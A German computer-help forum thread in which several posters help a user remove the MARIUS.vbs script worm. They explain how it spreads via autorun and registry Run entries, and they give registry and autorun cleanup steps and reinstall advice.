Wennich jetzt die datei lösche, heißt das dann das der virus, solange ich ihn nciht ausführe nicht wieder komtm oder heißt das, dass ich nur die sichtbaren anzwichen gelöscht ahe udn der im hintergrund shcön weiter arbeitet?

Beides ist möglich - nur eines ist sicher.
Solange du alles so belässt, wie es jetzt ist, wird sich nichts ändern und deine Frage nicht beantwortbar sein.

Es gibt allerdings einige Kriterien, die mich vermuten lassen, dass dein Schädling eine eher harmlose Variante ist:
Erstens, weil der Haken (msconfig) immer noch entfernt ist.
Zweitens, weil der Schädling überhaupt keine Anstalten macht, seine Anwesenheit vor dir geheim zu halten.

Letzteres machen nämlich nur Schädlinge, die den User zum Kauf eines Programms veranlassen wollen, welches angeblich diesen Schädling beseitigen kann...
Diese Schädlinge simulieren Windowsfehler, Infektionen u. dgl. und machen den User gleichzeitig darauf aufmerksam, mit welchem "Programm" dieses beseitigt werden könne.

Das alles scheint bei dir aber nicht vorzuliegen.

Gruß
Shrek3
Fatal ist mir um das Lumpenpack, das, um Herzen zu rühren, den Patriotismus trägt zur Schau, mit all seinen Geschwüren. Heinrich Heine
bei Antwort benachrichtigen
GarfTermy DSL - Freak „ja.. okay.. nur wie ist das denn mit dem virus? wenn ich jetzt alle daten...“
Optionen

deine daten gehören gesichert UND mit mindestens 2 virenscannern geprüft.

was zählt zu solchen daten?

texte, briefe, bilder, musik....

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
DSL - Freak GarfTermy „deine daten gehören gesichert UND mit mindestens 2 virenscannern geprüft. was...“
Optionen

soll ich sie mit meinem eigenen rechenr prüfen der mit einem anderen..?
Ich lasse jetzt gerade immernoh den kaspersky scan laufen um mal zu gucken wo überall viren sind.. danach installiere ichavg und durchsuche denkompletten pc.. dann reboote ich und scanne erneut...
was soll ich sonst noch tun?

Also noch aht mich ekier aufmerksam darauf geamcht, ein programm zu kaufen abe rich finde es auch sehr komishc, dass sich der virus bemerkbar macht...
Ist das okay so wie ich vorgehen will oder gibt es dagegen irgendwleche einwände oder andere vorgehensweisen, die eurer meinung anch sinvvoller wären?
Liebe Grüße

bei Antwort benachrichtigen
trilliput DSL - Freak „Als Virenscanner habe ich bereits Avira Antivir. Ist der nicht gut? Liebe...“
Optionen

Mein AVG meldet schon beim Betrachten dieser Seite mit dem Code der VBS-Datei einen entsprechenden Virus.

Dein Antivir tut es offensichtlich nicht.

Ich hatte die beiden auch parallen auf zwei Arbeitsrechnern im Einsatz, gerade die mit Droppern/Downloadern verpestete Seiten erkennt AGV schneller und zuverlässiger.

Was du dir daraus mitnimmst ist deine Sache.

bei Antwort benachrichtigen
DSL - Freak trilliput „Mein AVG meldet schon beim Betrachten dieser Seite mit dem Code der VBS-Datei...“
Optionen

hehe voll ahmemr :D:D
ich habe gerade mit einem freund geschrieben...
der hat mir auchgrade avg empfohlen.. lade den gerade runter...
....
wenn avg den dann löscht... heißt das dann dass er auf jeden fall weg ist?
Liebe Grüße..
DSl - Freak

bei Antwort benachrichtigen
GarfTermy trilliput „Mein AVG meldet schon beim Betrachten dieser Seite mit dem Code der VBS-Datei...“
Optionen

"...gerade die mit Droppern/Downloadern verpestete Seiten ..."

genau solche sites besucht man nicht. denn JEDER virenscanner läuft dem schadcode nur hinterher und wenn der böse virus auf dem rechner eingeschlagen ist - dann ist es schon zu spät.

wer also grob fahrlässig nicht vertrauenswürdige sites besucht, der darf sich auch nicht wundern, wenn´s bei ihm einschlägt.

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
DSL - Freak GarfTermy „ ...gerade die mit Droppern/Downloadern verpestete Seiten ... genau solche sites...“
Optionen

ich besuche keine vertrauensunwürdigen seiten.. aber ich habe mir minispiele udn sowas von nem kumpel gezogen.. also vllt besucht der andere seiten...
deshalbist es ja für micha uc mal interessant, zu wissen, wie sich dieser virus überhaupt verbreitet.. udn ob er sich eben ina lle datein setzt oder wie er das amcht..
Liebe Grüße

bei Antwort benachrichtigen
GarfTermy DSL - Freak „ich besuche keine vertrauensunwürdigen seiten.. aber ich habe mir minispiele...“
Optionen

"...aber ich habe mir minispiele udn sowas von nem kumpel gezogen..."

genau so.

du vertraust deinem kumpel - der ist das vertrauen aber nicht wert. du bist unvorsichtig - und bums - schon ist´s passiert.

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
DSL - Freak GarfTermy „ ...aber ich habe mir minispiele udn sowas von nem kumpel gezogen... genau so....“
Optionen

okay... das heißt.. we bekom mcih das jetzt wieder weg?
Ist die vorgehensweise von mir okay so?
Liebe grüße

bei Antwort benachrichtigen
xafford DSL - Freak „ Mutation of Trojan virus. My name is MARIUS.vbs On error resume next Dim...“
Optionen

Falls es Dir weiterhelfen sollte:

Das "Virus" ist ziemlich banal und tut nichts großartig außer folgendem:


  • Es kopiert sich selbst in den Systemordner von Windows nachdem es den Rechnernamen ausgelesen hat

  • Es sucht nach Wechseldatenträgern um sich auch auf denen abzulegen und mit einer Autostartfunktion aufzurufen

  • Es trägt sich in der Registry ein um bei jedem Systemstart mitgeladen zu werden

  • Es ändert den Browsertitel



Es läd also keinen Code aus dem Netz nach, spioniert keine Nutzerdaten aus, versendet keine Daten und mach nicht wirklich was kaputt, es schreit nur ganz laut "Ich bin da" und versucht sich zu verbreiten.

Und wscript.exe gehört zu Windows und ist ein Interpreter um Scripte auszuführen (vereinfacht gesagt).

Btw: Du solltest nicht als Administrator am System arbeiten und noch als Zusatz sei gesagt, dass bei aktiviertem Systemfileschutz gelöschte Dateien in Systemordnern automatisch wieder hergestellt werden, weswegen Du das Script im abgesicherten Modus löschen musst.
Pauschalurteile sind immer falsch!!!
bei Antwort benachrichtigen
DSL - Freak xafford „Falls es Dir weiterhelfen sollte: Das Virus ist ziemlich banal und tut nichts...“
Optionen

also ich habe den ursprung des scriptes auf meienr externen festplatte ausgemacht.. es war alsonicht von der lan sosndern von nem kumple, dem ich die externe vorher shcon gegeben hatte.
ich habe es gesxcahfft alle scripte mit der virensignatur zu löschen..
und die haken bei dem autostart dingens bleiben auch draußen...
zuerst ahben sich die viren imemr wieerhergesellt aber las ich alle auf einmal gelöscht hate ging es.. ich mach ejetz über nacht noch einmal einen suchluf..
ich hab schon getestet.. auch anch einem neustart sind an den zuvor identifizierten stellen keine virenscripte aufzufinden..
aber ich habe noch zwei probleme...
1.
der eintrag im internet explorer ist imemr noch da.. ichhätee gedacht der ändert sich mit löschen wieder.. wie ändere ich den?
2.
Immer wenn ich beim arbeitsplatz auf das symbol meienr festplatte klicke sagt er : "Die Scriptdatei "C:\MARIUS .vbs" wurde nicht gefunden."...
Wie bekomme ich es hin, dass mein autoplay wieder vernünftig funktioniert?
Ich melde euch morgen mittag noch die ergebnisse von dem kontrollscann...
es wäre aber shcön.. wenn ihr vorher vielleicht schon lösungsvorschläge für die anderen beieden probleme geben könntent...
vielen dank schonmal für die vielen infos und die gute hilfe,...

Liebe Grüße

bei Antwort benachrichtigen
shrek3 DSL - Freak „also ich habe den ursprung des scriptes auf meienr externen festplatte...“
Optionen

Um die Titelleiste des IE zu ändern, siehe hier:
http://www.winfaq.de/faq_html/Content/tip0500/onlinefaq.php?h=tip0515.htm

Um den Registryeintrag zu löschen, der auf die nicht mehr vorhandene Marius.vbs verweist:

Start -> Ausführen -> regedit -> OK.
Wenn sich die Registry geöffnet hat, klicke dich zu untenstehenden Schlüsseln durch und lösche nur in der rechten Fensterhälfte die Zeile, in der "Marius.vbs" erwähnt wird.

Die Schlüssel:
HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Run
HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Run

Nicht den gesamten Unterschlüssel "Run" löschen, sondern nur den einen Eintrag, der sich auf Marius.vbs bezieht!

Gruß
Shrek3

Fatal ist mir um das Lumpenpack, das, um Herzen zu rühren, den Patriotismus trägt zur Schau, mit all seinen Geschwüren. Heinrich Heine
bei Antwort benachrichtigen
xafford DSL - Freak „also ich habe den ursprung des scriptes auf meienr externen festplatte...“
Optionen

Zu 1.:

Windows-Startleiste → Start → Ausführen → "regedit" [ENTER]

In regedit dann dorthin navigieren:

KEY_CURRENT_USER → Software → Microsoft → Internet Explorer → Main

Dort den Eintrag "Window Title" suchen und entsprechend ändern oder löschen.

Zu 2.:
Im Explorer einstellen, dass er alle Dateien anzeigt, auch versteckte und Systemdateien, dann auf deine Festplatte gehen und nach "autorun.inf" suchen, diese löschen.

Aber Autorun ist etwas das man am besten gleich als allererstes deaktiviert, den Grund dafür kennst Du ja jetzt.

Pauschalurteile sind immer falsch!!!
bei Antwort benachrichtigen
DSL - Freak xafford „Zu 1.: Windows-Startleiste Start Ausführen regedit ENTER In regedit dann...“
Optionen

Also der titeal im internetexplorer ist dann gestern nachdem ich alle viren runtr hatte weggegangen..
der ist wiede rnormal..
aber ihc kann imemr noch nciht auf die platte zugreifen.. also zumindest nicht mit doppelklick...
und die beiden registry einträge gibt es nicht..
also es gibt in keie der ordner einen der sich auf MARIUS.vbs bezieht...
Woran könnte es sonst noch liegen?
nach den Atorun .inf datein suche ich gerade.. soll ich alle die ich finde einfach löschen??

Die Datei MARIUS.vbs steht übrigensa uch nciht mehr in der ansicht wenn man msconfig bei ausführen eingibt....
Liebe Grüße...
DSL - Freak

bei Antwort benachrichtigen
GarfTermy DSL - Freak „Also der titeal im internetexplorer ist dann gestern nachdem ich alle viren...“
Optionen

"...nachdem ich alle viren runtr ..."

mach endlich die kiste neu.

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
DSL - Freak GarfTermy „ ...nachdem ich alle viren runtr ... mach endlich die kiste neu. - “
Optionen

...
also ichhabs jez glaub ich echt alles runter..
sry dass ich mich solang nciht gemeldet hab aber hab mein pc umgbaut und hatte keine möglichkeit ins internet zu kommen....
so sagt mal zum neumachen brauch ich ne externe festplatte.. könnt ihrm ir da was empfehlen?
Ich ab nen paar threads gefunden aber nicht so richtige antworten lesen lkönnen, meist nur dass interne eh besser sind.. :(

DSL . Freak

bei Antwort benachrichtigen